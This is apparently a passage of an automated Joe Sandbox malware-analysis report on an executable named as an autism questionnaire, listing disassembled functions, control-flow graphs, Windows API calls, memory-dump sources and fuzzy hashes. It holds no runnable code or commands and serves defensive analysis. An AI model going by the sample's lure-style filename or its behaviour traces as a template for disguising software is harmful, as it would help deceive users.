                                                                                                • Part of subcall function 005B8740: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005B8765
                                                                                                • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                                              • ShowWindow.USER32(?,00000005,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C472B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
                                                                                              • String ID: Loj$Setup
                                                                                              • API String ID: 1533765661-1180797960
                                                                                              • Opcode ID: 17f777bc5e0ddd78fa34bb04f44403f63e29e5f52b8ab729edceb4b8c292e480
                                                                                              • Instruction ID: d4d45baa3e9a68820d1f8b3b63154724c7fffc608bd47f906fb52fcab16a7fb3
                                                                                              • Opcode Fuzzy Hash: 17f777bc5e0ddd78fa34bb04f44403f63e29e5f52b8ab729edceb4b8c292e480
                                                                                              • Instruction Fuzzy Hash: BE216D782046009FD700EF29DC91DA67BFAEB9E71071145B8F9008B3A2CE74BC80CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405A04, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 388 405a04-405a16 389 405c64-405c69 388->389 390 405a1c-405a2c 388->390 393 405d7c-405d7f 389->393 394 405c6f-405c80 389->394 391 405a84-405a8d 390->391 392 405a2e-405a3b 390->392 391->392 397 405a8f-405a9b 391->397 395 405a54-405a60 392->395 396 405a3d-405a4a 392->396 400 4057b0-4057d9 VirtualAlloc 393->400 401 405d85-405d87 393->401 398 405c82-405c9e 394->398 399 405c28-405c35 394->399 404 405a62-405a70 395->404 405 405ad8-405ae1 395->405 402 405a74-405a81 396->402 403 405a4c-405a50 396->403 397->392 407 405a9d-405aa9 397->407 408 405ca0-405ca8 398->408 409 405cac-405cbb 398->409 399->398 406 405c37-405c40 399->406 410 40580b-405811 400->410 411 4057db-405808 call 405764 400->411 418 405ae3-405af0 405->418 419 405b1c-405b26 405->419 406->399 412 405c42-405c56 Sleep 406->412 407->392 413 405aab-405ab7 407->413 414 405d08-405d1e 408->414 416 405cd4-405cdc 409->416 417 405cbd-405cd1 409->417 411->410 412->398 424 405c58-405c5f Sleep 412->424 413->391 425 405ab9-405ac9 Sleep 413->425 422 405d20-405d2e 414->422 423 405d37-405d43 414->423 427 405cf8-405cfa call 4056e8 416->427 428 405cde-405cf6 416->428 417->414 418->419 429 405af2-405afb 418->429 420 405b98-405ba4 419->420 421 405b28-405b53 419->421 438 405ba6-405bb8 420->438 439 405bcc-405bdb call 4056e8 420->439 433 405b55-405b63 421->433 434 405b6c-405b7a 421->434 422->423 435 405d30 422->435 436 405d64 423->436 437 405d45-405d58 423->437 424->399 425->392 440 405acf-405ad6 Sleep 425->440 430 405cff-405d07 427->430 428->430 429->418 431 405afd-405b11 Sleep 429->431 431->419 441 405b13-405b1a Sleep 431->441 433->434 442 405b65 433->442 443 405be8 434->443 444 405b7c-405b96 call 40561c 434->444 435->423 445 405d69-405d7b 436->445 437->445 446 405d5a-405d5f call 40561c 437->446 447 405bba 438->447 448 405bbc-405bca 438->448 451 405bed-405c26 439->451 454 405bdd-405be7 439->454 440->391 441->418 442->434 443->451 444->451 446->445 447->448 448->451
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405ABB
                                                                                              • Sleep.KERNEL32(0000000A,00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AD1
                                                                                              • Sleep.KERNEL32(00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AFF
                                                                                              • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405B15
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
                                                                                              • Instruction ID: 7a051e160dd760b70f5de690832b1da94a718f6c47d0b95a7d4eebd5f387ad29
                                                                                              • Opcode Fuzzy Hash: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
                                                                                              • Instruction Fuzzy Hash: BCC1F272601B118BDB15CF69E884B27BBA2EB85310F18827FD4599F3D5C7B4A841CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409EF8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 457 409ef8-409f0c 458 409f0e-409f1a call 409dd8 call 409e60 457->458 459 409f1f-409f26 457->459 458->459 461 409f28-409f33 GetCurrentThreadId 459->461 462 409f49-409f4d 459->462 461->462 464 409f35-409f44 call 409b30 call 409e34 461->464 465 409f71-409f75 462->465 466 409f4f-409f56 462->466 464->462 467 409f81-409f85 465->467 468 409f77-409f7a 465->468 466->465 471 409f58-409f6f 466->471 473 409fa4-409fad call 409b58 467->473 474 409f87-409f90 call 406fd0 467->474 468->467 472 409f7c-409f7e 468->472 471->465 472->467 483 409fb4-409fb9 473->483 484 409faf-409fb2 473->484 474->473 485 409f92-409fa2 call 408444 call 406fd0 474->485 486 409fd5-409fe0 call 409b30 483->486 487 409fbb-409fc9 call 40ebb8 483->487 484->483 484->486 485->473 496 409fe2 486->496 497 409fe5-409fe9 486->497 487->486 495 409fcb-409fcd 487->495 495->486 499 409fcf-409fd0 FreeLibrary 495->499 496->497 500 409ff2-409ff5 497->500 501 409feb-409fed call 409e34 497->501 499->486 502 409ff7-409ffe 500->502 503 40a00e 500->503 501->500 505 40a000 502->505 506 40a006-40a009 ExitProcess 502->506 505->506
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                                                              • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                                                                • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                                                • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                                                • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                                                • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                              • String ID: MZP
                                                                                              • API String ID: 3490077880-2889622443
                                                                                              • Opcode ID: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
                                                                                              • Instruction ID: e2cc099636b1ff89dc3d2fe7d8b391202ea9480b4d839bd65efd70e323d436a8
                                                                                              • Opcode Fuzzy Hash: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
                                                                                              • Instruction Fuzzy Hash: 60316F20B006429AD720AB7A9484B2777E66B44328F14053FE449E62E3D7BCDCC4C75D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409EF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 507 409ef0-409f0c 508 409f0e-409f1a call 409dd8 call 409e60 507->508 509 409f1f-409f26 507->509 508->509 511 409f28-409f33 GetCurrentThreadId 509->511 512 409f49-409f4d 509->512 511->512 514 409f35-409f44 call 409b30 call 409e34 511->514 515 409f71-409f75 512->515 516 409f4f-409f56 512->516 514->512 517 409f81-409f85 515->517 518 409f77-409f7a 515->518 516->515 521 409f58-409f6f 516->521 523 409fa4-409fad call 409b58 517->523 524 409f87-409f90 call 406fd0 517->524 518->517 522 409f7c-409f7e 518->522 521->515 522->517 533 409fb4-409fb9 523->533 534 409faf-409fb2 523->534 524->523 535 409f92-409fa2 call 408444 call 406fd0 524->535 536 409fd5-409fe0 call 409b30 533->536 537 409fbb-409fc9 call 40ebb8 533->537 534->533 534->536 535->523 546 409fe2 536->546 547 409fe5-409fe9 536->547 537->536 545 409fcb-409fcd 537->545 545->536 549 409fcf-409fd0 FreeLibrary 545->549 546->547 550 409ff2-409ff5 547->550 551 409feb-409fed call 409e34 547->551 549->536 552 409ff7-409ffe 550->552 553 40a00e 550->553 551->550 555 40a000 552->555 556 40a006-40a009 ExitProcess 552->556 555->556
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                                                              • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                                                                • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                                                • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                                                • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                                                • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                              • String ID: MZP
                                                                                              • API String ID: 3490077880-2889622443
                                                                                              • Opcode ID: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
                                                                                              • Instruction ID: 07d30fd0877b4d42c88f7c1dd8669400ca79996a2773cdc214a63d44a36a60ff
                                                                                              • Opcode Fuzzy Hash: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
                                                                                              • Instruction Fuzzy Hash: C4316E20A007828ADB21AB769494B2777E26F15318F14487FE049E62E3D7BCDCC4C71E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004785F8, Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 586 4785f8-478626 GetClassInfoW 587 478632-478634 586->587 588 478628-478630 586->588 590 478647-47864c RegisterClassW 587->590 591 478636-478642 UnregisterClassW 587->591 588->587 589 478651-478686 call 414da0 588->589 594 47869c-4786a2 589->594 595 478688-47868e call 47845c 589->595 590->589 591->590 597 478693-478697 SetWindowLongW 595->597 597->594
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                              • String ID:
                                                                                              • API String ID: 4025006896-0
                                                                                              • Opcode ID: d27d5fbb6baed82f6e21188927ffafad82830e40efd9868f5115729f59a844e9
                                                                                              • Instruction ID: 194e1b82028893281538589df9a22bcce55ada3cdaffe31495447ecbac098301
                                                                                              • Opcode Fuzzy Hash: d27d5fbb6baed82f6e21188927ffafad82830e40efd9868f5115729f59a844e9
                                                                                              • Instruction Fuzzy Hash: D501C4716452057BCB10EB98EC85FDF739EE758314F10811AF508E7391CA39E9418BA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006ACABC, Relevance: 6.0, APIs: 4, Instructions: 34sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 598 6acabc-6acac4 599 6acac7-6acacd call 60c158 598->599 601 6acad2-6acada 599->601 602 6acadc-6acae4 GetLastError 601->602 603 6acb07-6acb0d 601->603 602->603 604 6acae6-6acaee GetLastError 602->604 604->603 605 6acaf0-6acafc GetTickCount 604->605 605->603 606 6acafe-6acb05 Sleep 605->606 606->599
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CountSleepTick
                                                                                              • String ID:
                                                                                              • API String ID: 2227064392-0
                                                                                              • Opcode ID: 35463e065a5527016ee7a4c963826ed0809ea6ef911f6ad4ecb47253f51cee1b
                                                                                              • Instruction ID: 650aecd8dda8324acb9ef1ef12543e615cdaddf0aa48ac4ca6bdf88ba774c7be
                                                                                              • Opcode Fuzzy Hash: 35463e065a5527016ee7a4c963826ed0809ea6ef911f6ad4ecb47253f51cee1b
                                                                                              • Instruction Fuzzy Hash: 2AE02B7234838094D725356E58864BE8D5ACFC3376F280A3FF0C4D2182C4058D85C576
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006AE3C8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • SendNotifyMessageW.USER32(001D025E,00000496,00002711,-00000001), ref: 006AE618
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageNotifySend
                                                                                              • String ID: (\m$MS PGothic
                                                                                              • API String ID: 3556456075-219475269
                                                                                              • Opcode ID: 5872f3e2574d28b85d9b45cc1f1968af4813a13433e0e2fba3505ffcfb2f636e
                                                                                              • Instruction ID: c4b29eded5dd607060819086577383edb80d612be209ecb45f272f1b38c29540
                                                                                              • Opcode Fuzzy Hash: 5872f3e2574d28b85d9b45cc1f1968af4813a13433e0e2fba3505ffcfb2f636e
                                                                                              • Instruction Fuzzy Hash: 295150347011448BC700FF69D88AE5A77E3EB9A308B54557AF4049F366CA7AEC42CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0060D530, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D578
                                                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D581
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                              • String ID: .tmp
                                                                                              • API String ID: 1375471231-2986845003
                                                                                              • Opcode ID: 7adf05a90e5515b20f2e0cb1ccbcbaba2eca0b5d3a9ecc1b0ada5aca51d466d3
                                                                                              • Instruction ID: 90e89e80a8d15c693f6baa1c53929b57ef88e13b94ce627ec608a80cc6a9e7e5
                                                                                              • Opcode Fuzzy Hash: 7adf05a90e5515b20f2e0cb1ccbcbaba2eca0b5d3a9ecc1b0ada5aca51d466d3
                                                                                              • Instruction Fuzzy Hash: F4219975A502089FDB05EBE4CC51EEEB7B9EB88304F10457AF901F3381DA75AE058B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006ACB10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
